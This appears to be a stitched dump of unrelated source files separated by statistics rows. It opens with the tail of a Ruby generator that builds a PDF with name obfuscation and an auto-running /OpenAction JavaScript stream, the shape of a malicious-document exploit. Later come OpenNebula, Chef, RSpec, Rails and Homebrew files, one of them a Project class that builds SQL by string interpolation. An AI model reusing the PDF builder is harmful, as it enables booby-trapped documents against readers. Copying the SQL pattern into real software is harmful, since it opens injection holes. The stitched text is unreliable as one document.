pdf << ioDef(1) << nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu("/OpenAction ") << ioRef(5) << ">>" << endobj
xref << pdf.length
pdf << ioDef(2) << nObfu("<</Type/Outlines/Count 0>>") << endobj
xref << pdf.length
pdf << ioDef(3) << nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]/Count 1>>") << endobj
xref << pdf.length
pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[0 0 612 792]>>") << endobj
xref << pdf.length
pdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << endobj
xref << pdf.length
compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))
pdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
pdf << "trailer" << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
end
end
| 30.634146 | 156 | 0.543631 |
0189958ab536662d3b677d7ee581b469e9e8adea | 3,439 | #!/usr/bin/ruby
# -------------------------------------------------------------------------- #
# Copyright 2002-2020, OpenNebula Project, OpenNebula Systems #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#--------------------------------------------------------------------------- #
$LOAD_PATH.unshift File.dirname(__FILE__)
require 'mapper'
#-------------------------------------------------------------------------------
# These classes implement the mapping of raw filesystems & raw disk images
#-------------------------------------------------------------------------------
class FSRawMapper < Mapper
def do_map(one_vm, disk, _directory)
dsrc = one_vm.disk_source(disk)
File.chmod(0o646, dsrc) if File.symlink?(one_vm.sysds_path)
cmd = "#{COMMANDS[:losetup]} -f --show #{dsrc}"
rc, out, err = Command.execute(cmd, true)
        return out.chomp if rc.zero? && !out.empty?
OpenNebula.log_error("#{__method__}: #{err}")
nil
end
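    # On success this returns the loop device path printed by losetup,
    # e.g. "/dev/loop0"; on failure it logs the error and returns nil.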
def do_unmap(device, _one_vm, _disk, _directory)
cmd = "#{COMMANDS[:losetup]} -d #{device}"
rc, _out, err = Command.execute(cmd, true)
return true if rc.zero?
OpenNebula.log_error("#{__method__}: #{err}")
nil
end
end
class DiskRawMapper < Mapper
# Maps the whole file using kpartx. The output should be something like:
# $ sudo kpartx -av /var/lib/one/datastores/100/0/disk.0
# add map loop3p1 (253:0): 0 204800 linear 7:3 2048
# add map loop3p2 (253:1): 0 524288 linear 7:3 206848
# add map loop3p3 (253:2): 0 1366016 linear 7:3 731136
    # First line is matched to find loop device 3, returning "/dev/loop3"
def do_map(one_vm, disk, directory)
dsrc = one_vm.disk_source(disk)
cmd = "#{COMMANDS[:kpartx]} -s -av #{dsrc}"
rc, out, err = Command.execute(cmd, true)
if rc != 0 || out.empty?
OpenNebula.log_error("#{__method__}: #{err}")
return
end
loopdev = out.lines[0].match(/.*add map loop(\d+)p\d+.*/)
return nil if !loopdev
"/dev/loop#{loopdev[1]}"
end
# Unmaps all devices and loops with kpartx using the source file
def do_unmap(device, one_vm, disk, directory)
dsrc = one_vm.disk_source(disk)
cmd = "#{COMMANDS[:kpartx]} -d #{dsrc}"
rc, _out, err = Command.execute(cmd, true)
return true if rc.zero?
OpenNebula.log_error("#{__method__}: #{err}")
nil
end
end
| 35.822917 | 80 | 0.503053 |
7a19e38c5da4296f83a03b3c4ff830a27876bc0d | 3,970 | #
# Author:: Sean OMeara (<[email protected]>)
# Recipe:: yum-mysql-community::mysql56-community
#
# Copyright:: 2014-2019, Chef Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
yum_repository 'mysql56-community' do
description node['yum']['mysql56-community']['description'] unless node['yum']['mysql56-community']['description'].nil?
baseurl node['yum']['mysql56-community']['baseurl'] unless node['yum']['mysql56-community']['baseurl'].nil?
mirrorlist node['yum']['mysql56-community']['mirrorlist'] unless node['yum']['mysql56-community']['mirrorlist'].nil?
gpgcheck node['yum']['mysql56-community']['gpgcheck'] unless node['yum']['mysql56-community']['gpgcheck'].nil?
gpgkey node['yum']['mysql56-community']['gpgkey'] unless node['yum']['mysql56-community']['gpgkey'].nil?
enabled node['yum']['mysql56-community']['enabled'] unless node['yum']['mysql56-community']['enabled'].nil?
cost node['yum']['mysql56-community']['cost'] unless node['yum']['mysql56-community']['cost'].nil?
exclude node['yum']['mysql56-community']['exclude'] unless node['yum']['mysql56-community']['exclude'].nil?
enablegroups node['yum']['mysql56-community']['enablegroups'] unless node['yum']['mysql56-community']['enablegroups'].nil?
failovermethod node['yum']['mysql56-community']['failovermethod'] unless node['yum']['mysql56-community']['failovermethod'].nil?
http_caching node['yum']['mysql56-community']['http_caching'] unless node['yum']['mysql56-community']['http_caching'].nil?
include_config node['yum']['mysql56-community']['include_config'] unless node['yum']['mysql56-community']['include_config'].nil?
includepkgs node['yum']['mysql56-community']['includepkgs'] unless node['yum']['mysql56-community']['includepkgs'].nil?
keepalive node['yum']['mysql56-community']['keepalive'] unless node['yum']['mysql56-community']['keepalive'].nil?
max_retries node['yum']['mysql56-community']['max_retries'] unless node['yum']['mysql56-community']['max_retries'].nil?
metadata_expire node['yum']['mysql56-community']['metadata_expire'] unless node['yum']['mysql56-community']['metadata_expire'].nil?
mirror_expire node['yum']['mysql56-community']['mirror_expire'] unless node['yum']['mysql56-community']['mirror_expire'].nil?
priority node['yum']['mysql56-community']['priority'] unless node['yum']['mysql56-community']['priority'].nil?
proxy node['yum']['mysql56-community']['proxy'] unless node['yum']['mysql56-community']['proxy'].nil?
proxy_username node['yum']['mysql56-community']['proxy_username'] unless node['yum']['mysql56-community']['proxy_username'].nil?
proxy_password node['yum']['mysql56-community']['proxy_password'] unless node['yum']['mysql56-community']['proxy_password'].nil?
repositoryid node['yum']['mysql56-community']['repositoryid'] unless node['yum']['mysql56-community']['repositoryid'].nil?
sslcacert node['yum']['mysql56-community']['sslcacert'] unless node['yum']['mysql56-community']['sslcacert'].nil?
sslclientcert node['yum']['mysql56-community']['sslclientcert'] unless node['yum']['mysql56-community']['sslclientcert'].nil?
sslclientkey node['yum']['mysql56-community']['sslclientkey'] unless node['yum']['mysql56-community']['sslclientkey'].nil?
sslverify node['yum']['mysql56-community']['sslverify'] unless node['yum']['mysql56-community']['sslverify'].nil?
timeout node['yum']['mysql56-community']['timeout'] unless node['yum']['mysql56-community']['timeout'].nil?
action :create
end
| 81.020408 | 133 | 0.722166 |
6255e345ee43eb963e1777e6d0b83eca49523f4e | 7,807 | require 'spec_helper'
class TestSubject
include DataMagic
end
describe "DataMagic translations" do
context "when delivering data" do
let(:example) { TestSubject.new }
def set_field_value(value)
DataMagic.should_receive(:yml).twice.and_return({'key' => {'field' => value}})
end
it "should deliver the hash from the yaml" do
set_field_value 'value'
example.data_for('key').should have_field_value 'value'
end
it "should default to use a file named 'default.yml'" do
DataMagic::Config.yml_directory = 'test'
YAML.should_receive(:load_file).with("test/default.yml").and_return({})
DataMagic.should_receive(:yml).and_return(nil)
DataMagic.should_receive(:yml).and_return({'key' => {'field' => 'value'}})
example.data_for('key').should have_field_value 'value'
end
it "should clone the data returned so it can be resued" do
yaml = double('yaml')
yaml.stub(:merge).and_return(yaml)
DataMagic.should_receive(:yml).twice.and_return(yaml)
yaml.should_receive(:[]).and_return(yaml)
yaml.should_receive(:clone).and_return({'field' => 'value'})
example.data_for('key').should have_field_value 'value'
end
it "should merge the provided data with the yaml data" do
yaml = double('yaml')
DataMagic.should_receive(:yml).twice.and_return(yaml)
yaml.should_receive(:[]).and_return(yaml)
yaml.should_receive(:merge).and_return(yaml)
yaml.should_receive(:clone).and_return({'field' => 'value'})
example.data_for('key').should have_field_value 'value'
end
context "translating random names" do
it "should add a name" do
Faker::Name.should_receive(:name).and_return('Joseph')
set_field_value '~full_name'
example.data_for('key').should have_field_value 'Joseph'
end
it "should add first name" do
Faker::Name.should_receive(:first_name).and_return('Sam')
set_field_value '~first_name'
example.data_for('key').should have_field_value 'Sam'
end
it "should add last name" do
Faker::Name.should_receive(:last_name).and_return('Smith')
set_field_value '~last_name'
example.data_for('key').should have_field_value 'Smith'
end
end
context "translating random addresses" do
it "should add a street address" do
Faker::Address.should_receive(:street_address).and_return("123 Main")
set_field_value '~street_address'
example.data_for('key').should have_field_value '123 Main'
end
it "should add a city" do
Faker::Address.should_receive(:city).and_return('Cleveland')
set_field_value '~city'
example.data_for('key').should have_field_value 'Cleveland'
end
it "should add a state" do
Faker::Address.should_receive(:state).and_return('Ohio')
set_field_value '~state'
example.data_for('key').should have_field_value 'Ohio'
end
it "should add a state abbreviation" do
Faker::Address.should_receive(:state_abbr).and_return('OH')
set_field_value '~state_abbr'
example.data_for('key').should have_field_value 'OH'
end
it "should add a zip code" do
Faker::Address.should_receive(:zip_code).and_return('11111')
set_field_value '~zip_code'
example.data_for('key').should have_field_value '11111'
end
it "should add a country" do
Faker::Address.should_receive(:country).and_return("United States")
set_field_value '~country'
example.data_for('key').should have_field_value 'United States'
end
it "should add a secondary address" do
Faker::Address.should_receive(:secondary_address).and_return('2nd floor')
set_field_value '~secondary_address'
example.data_for('key').should have_field_value '2nd floor'
end
end
context "translating company names" do
it "should add a company name" do
Faker::Company.should_receive(:name).and_return('LeanDog')
set_field_value '~company_name'
example.data_for('key').should have_field_value 'LeanDog'
end
end
context "translating email address" do
it "should add an email address" do
Faker::Internet.should_receive(:email).and_return('[email protected]')
set_field_value '~email_address'
example.data_for('key').should have_field_value '[email protected]'
end
end
context "translating phone numbers" do
it "shold add a phone number" do
Faker::PhoneNumber.should_receive(:phone_number).and_return('555-555-5555')
set_field_value '~phone_number'
example.data_for('key').should have_field_value '555-555-5555'
end
end
context "translating random phrases" do
it "should add a catch phrase" do
Faker::Company.should_receive(:catch_phrase).and_return('Ruby is cool')
set_field_value '~catch_phrase'
example.data_for('key').should have_field_value 'Ruby is cool'
end
it "should add random words" do
Faker::Lorem.should_receive(:words).and_return(['random', 'words'])
set_field_value '~words'
example.data_for('key').should have_field_value 'random words'
end
it "should default to returning 3 words" do
set_field_value '~words'
example.data_for('key')['field'].split.size.should == 3
end
it "should allow you to specify the number of words" do
set_field_value '~words(4)'
example.data_for('key')['field'].split.size.should == 4
end
it "should add a random sentence" do
Faker::Lorem.should_receive(:sentence).and_return('a sentence')
set_field_value '~sentence'
example.data_for('key').should have_field_value 'a sentence'
end
it "should default to returning a minimum of 4 words" do
set_field_value '~sentence'
example.data_for('key')['field'].split.size.should >= 4
end
it "should allow you to specify a minimum word count" do
set_field_value '~sentence(20)'
example.data_for('key')['field'].split.size.should >= 20
end
it "should add sentences" do
Faker::Lorem.should_receive(:sentences).and_return(['this is sentences'])
set_field_value '~sentences'
example.data_for('key').should have_field_value 'this is sentences'
end
it "should default to returning a default of 3 sentences" do
set_field_value '~sentences'
example.data_for('key')['field'].split('.').size.should >= 3
end
it "should allow you to specify the number of sentences" do
set_field_value '~sentences(10)'
example.data_for('key')['field'].split('.').size.should >= 10
end
it "should add a paragraphs" do
Faker::Lorem.should_receive(:paragraphs).and_return(['this is a paragraph'])
set_field_value '~paragraphs'
example.data_for('key').should have_field_value 'this is a paragraph'
end
it "should return 3 paragraphs by default" do
set_field_value '~paragraphs'
example.data_for('key')['field'].split('\n\n').size.should == 3
end
it "should allow you to specify the number of paragraphs" do
set_field_value '~paragraphs(10)'
example.data_for('key')['field'].split('\n\n').size.should == 10
end
end
context "translating boolean values" do
it "should resolve true" do
set_field_value true
example.data_for('key').should have_field_value true
end
it "should resolve false" do
set_field_value false
example.data_for('key').should have_field_value false
end
end
end
end
| 35.648402 | 84 | 0.660049 |
79e199e046dbd897536bf2770424545187baf659 | 93 | class Page < ActiveRecord::Base
belongs_to :book
mount_uploader :image, PageUploader
end
| 18.6 | 37 | 0.784946 |
1897293e213f4a206e40353ce6fb9b2f7c7719e1 | 1,307 | class Project
attr_accessor :title
attr_reader :id
def initialize(attributes)
@title = attributes.fetch(:title)
@id = attributes.fetch(:id)
end
  def save()
    # NOTE: interpolating @title directly into SQL is vulnerable to SQL injection.
    result = DB.exec("INSERT INTO projects (title) VALUES ('#{@title}') RETURNING id;")
    @id = result.first().fetch("id").to_i
  end
  def ==(other)
    self.title == other.title
  end
def self.all()
from_db_projects = DB.exec("SELECT * FROM projects;")
projects = []
from_db_projects.each do |project|
title = project.fetch("title")
id = project.fetch("id").to_i
projects.push(Project.new({:title => title, :id => id}))
end
projects
end
def self.find(id)
project = DB.exec("SELECT * FROM projects WHERE id = #{id};").first
title = project.fetch("title")
Project.new({:title => title, :id => id})
end
def volunteers
Volunteer.find_by_project(self.id)
end
def update(attributes)
@title = attributes.fetch(:title)
DB.exec("UPDATE projects SET title = '#{@title}' WHERE id = #{@id};")
end
def delete()
DB.exec("DELETE FROM projects WHERE id = #{@id};")
end
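  # Hypothetical usage sketch — assumes a PG connection object in DB and an
  # existing `projects` table; the title below is invented:
  #   project = Project.new({:title => "Recycling", :id => nil})
  #   project.save()
  #   Project.find(project.id).title # => "Recycling"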
end
| 24.203704 | 93 | 0.626626 |
0178b3689ffff1f893e39385036afe4407149417 | 1,004 | require "base64"
require "openssl"
require "time"
module Cassieq
class Authentication
attr_reader :key, :account
def self.generate_auth_headers(key, account, method, path)
new(key, account).auth_headers(method, path)
end
def initialize(key, account)
@key = key
@account = account
end
    def auth_headers(method, path, request_time = formatted_time_now)
auth_signature = signature_from_key(method, path, request_time)
{ "X-Cassieq-Request-Time" => request_time, "Authorization" => "Signed #{auth_signature}" }
end
    def signature_from_key(method, path, request_time = formatted_time_now)
key_bytes = Base64.urlsafe_decode64("#{key}==")
string_to_sign = [account, method.to_s.upcase, path, request_time].join("\n")
hmac = OpenSSL::HMAC.digest("sha256", key_bytes, string_to_sign)
Base64.urlsafe_encode64(hmac).gsub(/=+$/, "")
end
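    # Illustrative usage — the key, account, and path below are invented:
    #   auth = Cassieq::Authentication.new("c2VjcmV0LWtleQ", "my-account")
    #   auth.auth_headers(:get, "/v1/accounts/my-account/queues")
    #   # => { "X-Cassieq-Request-Time" => "2017-01-01T00:00:00Z",
    #   #      "Authorization" => "Signed <url-safe base64 HMAC-SHA256>" }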
private
    def formatted_time_now
Time.now.utc.iso8601
end
end
end
| 26.421053 | 97 | 0.683267 |
bbdea2f54c94711bd24e2b90789f9629eb5230be | 1,870 | class Cpprestsdk < Formula
desc "C++ libraries for cloud-based client-server communication"
homepage "https://github.com/Microsoft/cpprestsdk"
url "https://github.com/Microsoft/cpprestsdk/archive/v2.10.6.tar.gz"
sha256 "5fecccc779b077f18acf0f7601b19b39c3da963498ed5b10bb2700dccfe66c5a"
head "https://github.com/Microsoft/cpprestsdk.git", :branch => "development"
bottle do
cellar :any
sha256 "70aa8095ca1b1ad92ca77122602d1fc999b523e9cb97f680a056328620c571fe" => :mojave
sha256 "9103ac596b82312771f1b1cd2b0a7dfc3cf0c2dfe3d51eb9642d9488a51cc3be" => :high_sierra
sha256 "9172c16e95e799434c9336b7c6d87893dd507e7b7682e9009c8bc59eaabf47f3" => :sierra
sha256 "8e5cf344c01e662cd85aa46ff662d87763897e948dc6de1d4a41f3e238cd49ae" => :x86_64_linux
end
depends_on "cmake" => :build
depends_on "boost"
depends_on "openssl"
def install
system "cmake", "-DBUILD_SAMPLES=OFF", "-DBUILD_TESTS=OFF", "Release", *std_cmake_args
system "make", "install"
end
test do
(testpath/"test.cc").write <<~EOS
#include <iostream>
#include <cpprest/http_client.h>
int main() {
web::http::client::http_client client(U("https://github.com/"));
std::cout << client.request(web::http::methods::GET).get().extract_string().get() << std::endl;
}
EOS
flags = ["-stdlib=libc++", "-std=c++11", "-I#{include}",
"-I#{Formula["boost"].include}",
"-I#{Formula["openssl"].include}", "-L#{lib}",
"-L#{Formula["openssl"].lib}", "-L#{Formula["boost"].lib}",
"-lssl", "-lcrypto", "-lboost_random", "-lboost_chrono",
"-lboost_thread-mt", "-lboost_system-mt", "-lboost_regex",
"-lboost_filesystem", "-lcpprest"] + ENV.cflags.to_s.split
system ENV.cxx, "-o", "test_cpprest", "test.cc", *flags
system "./test_cpprest"
end
end
| 41.555556 | 103 | 0.671123 |
ffd7d776f0b9fdf2b5a99c6b32a48ae6c457955d | 1,423 | action :create do
template "shinken/arbiter/#{template? ? "templates/": ""}hostgroups/#{new_resource.hostgroup_key}" do
path full_path
source "definitions/hostgroups/hostgroup.cfg.erb"
mode 00644
variables({
:hostgroup_key => new_resource.hostgroup_key,
:hostgroup_name => new_resource.hostgroup_name,
:hostgroup_alias => new_resource.hostgroup_alias,
:notes => new_resource.notes,
:notes_url => new_resource.notes_url,
:action_url => new_resource.action_url,
:realm => new_resource.realm,
:register => new_resource.register,
:use => new_resource.use
})
action :create
notifies :restart, "service[shinken-arbiter]", :delayed
end
node.run_state["shinken"]["arbiter"]["hostgroups"].push(path)
end
action :delete do
file full_path do
action :delete
end
end
def template?
not new_resource.register
end
def path
paths = ["hostgroups", "#{new_resource.hostgroup_key}.cfg"]
paths.unshift("templates") if not new_resource.register
::File.join(paths)
end
def full_path
::File.join("/etc/shinken/objects-chef", path)
end
def hostgroup_path
paths = ["hostgroups", new_resource.hostgroup_key]
paths.unshift("templates") if not new_resource.register
::File.join(paths)
end
def full_hostgroup_path
::File.join("/etc/shinken/objects-chef", hostgroup_path)
end
| 24.964912 | 103 | 0.683064 |
f76582700c4bf84ae3deb9cd2d1d5d2ac65380a4 | 491 | class Student < ApplicationRecord
belongs_to :parent
belongs_to :course
has_many :lessons
has_one :teacher, through: :course
# has_many :courses
# has_many :teachers, through: :courses
# Include default devise modules. Others available are:
# :confirmable, :lockable, :timeoutable and :omniauthable
devise :database_authenticatable,
:recoverable, :rememberable, :trackable, :validatable
mount_uploader :image, StudentUploader
GENDER = ['Male', 'Female']
end
| 25.842105 | 62 | 0.741344 |
5d41d3990260885c8059e1116cf5d30e9d8c3a79 | 15,358 | require 'support/spec_support'
require 'cheffish/rspec/chef_run_support'
require 'support/key_support'
repo_path = Dir.mktmpdir('chef_repo')
describe Chef::Resource::PrivateKey do
extend Cheffish::RSpec::ChefRunSupport
before :each do
FileUtils.remove_entry_secure(repo_path)
Dir.mkdir(repo_path)
end
context 'with a recipe with a private_key' do
it 'the private_key is created in pem format' do
expect_recipe {
private_key "#{repo_path}/blah"
}.to have_updated "private_key[#{repo_path}/blah]", :create
expect(IO.read("#{repo_path}/blah")).to start_with('-----BEGIN')
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))).to be_kind_of(OpenSSL::PKey::RSA)
end
end
context 'with a private_key "blah" resource' do
before :each do
Dir.mkdir("#{repo_path}/other_keys")
Chef::Config.private_key_paths = [ repo_path, "#{repo_path}/other_keys" ]
end
it 'the private key is created in the private_key_write_path' do
expect_recipe {
private_key 'blah'
}.to have_updated "private_key[blah]", :create
expect(Chef::Config.private_key_write_path).to eq(repo_path)
expect(File.exist?("#{repo_path}/blah")).to be true
expect(File.exist?("#{repo_path}/other_keys/blah")).to be false
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))).to be_kind_of(OpenSSL::PKey::RSA)
expect(OpenSSL::PKey.read(Cheffish.get_private_key('blah'))).to be_kind_of(OpenSSL::PKey::RSA)
end
context 'and the private key already exists somewhere not in the write path' do
before :each do
recipe { private_key "#{repo_path}/other_keys/blah" }.converge
end
      it 'the private key is not updated' do
expect_recipe {
private_key 'blah'
}.not_to have_updated "private_key[blah]", :create
expect(File.exist?("#{repo_path}/blah")).to be false
expect(File.exist?("#{repo_path}/other_keys/blah")).to be true
end
end
end
context 'with a private key' do
before :each do
Cheffish::BasicChefClient.converge_block do
private_key "#{repo_path}/blah"
end
end
context 'and a private_key that copies it in der format' do
it 'the private_key is copied in der format and is identical' do
expect_recipe {
private_key "#{repo_path}/blah.der" do
source_key_path "#{repo_path}/blah"
format :der
end
}.to have_updated "private_key[#{repo_path}/blah.der]", :create
key_str = IO.read("#{repo_path}/blah.der")
expect(key_str).not_to start_with('-----BEGIN')
expect(key_str).not_to start_with('ssh-')
expect("#{repo_path}/blah.der").to match_private_key("#{repo_path}/blah")
end
end
it 'a private_key that copies it from in-memory as a string succeeds' do
expect_recipe {
private_key "#{repo_path}/blah.der" do
source_key IO.read("#{repo_path}/blah")
format :der
end
}.to have_updated "private_key[#{repo_path}/blah.der]", :create
key_str = IO.read("#{repo_path}/blah.der")
expect(key_str).not_to start_with('-----BEGIN')
expect(key_str).not_to start_with('ssh-')
expect("#{repo_path}/blah.der").to match_private_key("#{repo_path}/blah")
end
it 'a private_key that copies it from in-memory as a key succeeds' do
key = OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))
expect_recipe {
private_key "#{repo_path}/blah.der" do
source_key key
format :der
end
}.to have_updated "private_key[#{repo_path}/blah.der]", :create
key_str = IO.read("#{repo_path}/blah.der")
expect(key_str).not_to start_with('-----BEGIN')
expect(key_str).not_to start_with('ssh-')
expect("#{repo_path}/blah.der").to match_private_key("#{repo_path}/blah")
end
context 'and a public_key recipe' do
it 'the public_key is created' do
expect_recipe {
public_key "#{repo_path}/blah.pub" do
source_key_path "#{repo_path}/blah"
end
}.to have_updated "public_key[#{repo_path}/blah.pub]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
context 'and a public key' do
before :each do
Cheffish::BasicChefClient.converge_block do
public_key "#{repo_path}/blah.pub" do
source_key_path "#{repo_path}/blah"
end
end
end
context 'and public_key resource based off the public key file' do
it 'the second public_key is created' do
expect_recipe {
public_key "#{repo_path}/blah.pub2" do
source_key_path "#{repo_path}/blah.pub"
end
}.to have_updated "public_key[#{repo_path}/blah.pub2]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
context 'and another public_key based off the first public_key in-memory in a string' do
it 'the second public_key is created' do
expect_recipe {
public_key "#{repo_path}/blah.pub2" do
source_key IO.read("#{repo_path}/blah.pub")
end
}.to have_updated "public_key[#{repo_path}/blah.pub2]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
it 'and another public_key based off the first public_key in-memory in a key, the second public_key is created' do
key, format = Cheffish::KeyFormatter.decode(IO.read("#{repo_path}/blah.pub"))
expect_recipe {
public_key "#{repo_path}/blah.pub2" do
source_key key
end
}.to have_updated "public_key[#{repo_path}/blah.pub2]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
context 'and another public_key in :pem format based off the first public_key' do
it 'the second public_key is created' do
expect_recipe {
public_key "#{repo_path}/blah.pub2" do
source_key_path "#{repo_path}/blah.pub"
format :pem
end
}.to have_updated "public_key[#{repo_path}/blah.pub2]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
context 'and another public_key in :der format based off the first public_key' do
it 'the second public_key is created' do
expect_recipe {
public_key "#{repo_path}/blah.pub2" do
source_key_path "#{repo_path}/blah.pub"
format :pem
end
}.to have_updated "public_key[#{repo_path}/blah.pub2]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
end
context 'and a public_key resource in pem format' do
it 'the public_key is created' do
expect_recipe {
public_key "#{repo_path}/blah.pub" do
source_key_path "#{repo_path}/blah"
format :pem
end
}.to have_updated "public_key[#{repo_path}/blah.pub]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('-----BEGIN')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
context 'and a public_key resource in der format' do
it 'the public_key is created in openssh format' do
expect_recipe {
public_key "#{repo_path}/blah.pub" do
source_key_path "#{repo_path}/blah"
format :der
end
}.to have_updated "public_key[#{repo_path}/blah.pub]", :create
expect(IO.read("#{repo_path}/blah.pub")).not_to start_with('-----BEGIN')
expect(IO.read("#{repo_path}/blah.pub")).not_to start_with('ssh-rsa')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
end
context 'with a recipe with a private_key in der format' do
it 'the private_key is created' do
expect_recipe {
private_key "#{repo_path}/blah" do
format :der
end
}.to have_updated "private_key[#{repo_path}/blah]", :create
expect(IO.read("#{repo_path}/blah")).not_to start_with('-----BEGIN')
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))).to be_kind_of(OpenSSL::PKey::RSA)
end
end
context 'with a private key in der format' do
before :each do
Cheffish::BasicChefClient.converge_block do
private_key "#{repo_path}/blah" do
format :der
end
end
end
context 'and a public_key' do
it 'the public_key is created in openssh format' do
expect_recipe {
public_key "#{repo_path}/blah.pub" do
source_key_path "#{repo_path}/blah"
end
}.to have_updated "public_key[#{repo_path}/blah.pub]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah"
end
end
end
context 'with a recipe with a private_key with a pass_phrase' do
it 'the private_key is created' do
expect_recipe {
private_key "#{repo_path}/blah" do
pass_phrase 'hello'
end
}.to have_updated "private_key[#{repo_path}/blah]", :create
expect(IO.read("#{repo_path}/blah")).to start_with('-----BEGIN')
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"), 'hello')).to be_kind_of(OpenSSL::PKey::RSA)
end
end
context 'with a private key with a pass phrase' do
before :each do
Cheffish::BasicChefClient.converge_block do
private_key "#{repo_path}/blah" do
pass_phrase 'hello'
end
end
end
context 'and a private_key that copies it in der format' do
it 'the private_key is copied in der format and is identical' do
expect_recipe {
private_key "#{repo_path}/blah.der" do
source_key_path "#{repo_path}/blah"
source_key_pass_phrase 'hello'
format :der
end
}.to have_updated "private_key[#{repo_path}/blah.der]", :create
key_str = IO.read("#{repo_path}/blah.der")
expect(key_str).not_to start_with('-----BEGIN')
expect(key_str).not_to start_with('ssh-')
expect("#{repo_path}/blah.der").to match_private_key("#{repo_path}/blah", 'hello')
end
end
context 'and a private_key resource pointing at it without a pass_phrase' do
it 'the run fails with an exception' do
expect {
converge {
private_key "#{repo_path}/blah"
}
}.to raise_error /missing pass phrase?/
end
end
context 'and a private_key resource with no pass phrase and regenerate_if_different' do
it 'the private_key is regenerated' do
expect_recipe {
private_key "#{repo_path}/blah" do
regenerate_if_different true
end
}.to have_updated "private_key[#{repo_path}/blah]", :create
expect(IO.read("#{repo_path}/blah")).to start_with('-----BEGIN')
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))).to be_kind_of(OpenSSL::PKey::RSA)
end
end
it 'a private_key resource that copies it from in-memory as a string succeeds' do
expect_recipe {
private_key "#{repo_path}/blah.der" do
source_key IO.read("#{repo_path}/blah")
source_key_pass_phrase 'hello'
format :der
end
}.to have_updated "private_key[#{repo_path}/blah.der]", :create
key_str = IO.read("#{repo_path}/blah.der")
expect(key_str).not_to start_with('-----BEGIN')
expect(key_str).not_to start_with('ssh-')
expect("#{repo_path}/blah.der").to match_private_key("#{repo_path}/blah", 'hello')
end
context 'and a public_key' do
it 'the public_key is created in openssh format' do
expect_recipe {
public_key "#{repo_path}/blah.pub" do
source_key_path "#{repo_path}/blah"
source_key_pass_phrase 'hello'
end
}.to have_updated "public_key[#{repo_path}/blah.pub]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah", 'hello'
end
end
context 'and a public_key derived from the private key in an in-memory string' do
it 'the public_key is created in openssh format' do
expect_recipe {
public_key "#{repo_path}/blah.pub" do
source_key IO.read("#{repo_path}/blah")
source_key_pass_phrase 'hello'
end
}.to have_updated "public_key[#{repo_path}/blah.pub]", :create
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
expect("#{repo_path}/blah.pub").to be_public_key_for "#{repo_path}/blah", 'hello'
end
end
end
context 'with a recipe with a private_key and public_key_path' do
it 'the private_key and public_key are created' do
expect_recipe {
private_key "#{repo_path}/blah" do
public_key_path "#{repo_path}/blah.pub"
end
}.to have_updated "private_key[#{repo_path}/blah]", :create
expect(IO.read("#{repo_path}/blah")).to start_with('-----BEGIN')
expect(OpenSSL::PKey.read(IO.read("#{repo_path}/blah"))).to be_kind_of(OpenSSL::PKey::RSA)
expect(IO.read("#{repo_path}/blah.pub")).to start_with('ssh-rsa ')
